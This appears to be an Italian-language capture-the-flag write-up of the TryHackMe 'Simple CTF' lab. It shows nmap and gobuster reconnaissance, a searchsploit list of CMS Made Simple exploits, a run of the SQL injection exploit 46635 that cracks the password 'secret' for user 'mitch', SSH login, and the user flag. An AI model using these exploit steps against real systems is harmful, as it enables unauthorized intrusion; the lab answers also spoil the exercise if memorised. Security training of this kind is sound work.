# SIMPLE CTF / TryHackMe

# PING 10.10.138.173

# SCANSIONE NMAP: nmap -sC -sT 10.10.138.173
-----------------------------------------------------------------------------------------
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-04 10:38 CET
Nmap scan report for 10.10.138.173
Host is up (0.00079s latency).
Not shown: 551 filtered tcp ports (net-unreach), 446 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
2222/tcp open  EtherNetIP-1
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 5.76 seconds
----------------------------------------------------------------------------------------

# INTERCETTARE POSSIBILI SUBDOMAIN CON GOBUSTER: gobuster dir -u http://10.10.138.173 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,php,js -e -t 50

-------------------------------------------------------------------------------------------------------
ttp://10.10.138.173/robots.txt           (Status: 200) [Size: 929]
http://10.10.138.173/simple               (Status: 301) [Size: 315] [--> http://10.10.138.173/simple/]
-------------------------------------------------------------------------------------------------------

# SEARCHSPLOIT. 
Dopo aver trovato robots.txt e subdomain /simple ho cercato possibili vulnerabilita' per cms con il comando: searchsploit cms made simple

-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                            |  Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)                                        | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting                                                                   | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion                                                                   | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting                                                                | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection                                                                    | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities                                                   | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities                                                                         | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution                                                                               | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                                                      | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload                                                          | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion                                                                              | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure                                                                             | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting                                                       | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities                                                                          | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery                                                                          | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion                                                             | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery                                                   | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection                                            | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities                                                                          | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution                                                                             | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                                                            | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                                                              | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)                                                  | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)                                                               | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated)                                                                              | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)                                  | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                                                             | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                                                             | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning                                                           | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection                                                                                  | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload                                                          | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload                                                     | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload                                            | php/webapps/46546.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

# SQLI. Dopo aver rovato un exploit procediamo con sql injection con il comando: searchsploit -m 46635                       
  -------------------------------------------------------------------
  Exploit: CMS Made Simple < 2.2.10 - SQL Injection
      URL: https://www.exploit-db.com/exploits/46635
     Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable
---------------------------------------------------------------------
Copied to: /home/rain/46635.py
---------------------------------------------------------------------

# INSTALLARE LIBRERIE MANCANTI CON IL COMANDO: pip install 2to3 e, successivamente: python3 -m lib2to3 46635.py -w

# ESEGUIRE SQLI	con il comando: python3 46635.py -u http://10.10.138.173/simple/ --crack -w ~/Modelli/best110.txt

----------------------------------
[+] Salt for password found: 1dw
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: secret
----------------------------------

# SSH: dopo aver trovato nome utente(mitch) e password(secret) stabiliamo una connessione con il comando: ssh -p 2222 mitch@10.10.138.173
e possiamo stampare subito la user flag con cat user.txt
------------------------
g00d j0b, w3ll done!
------------------------
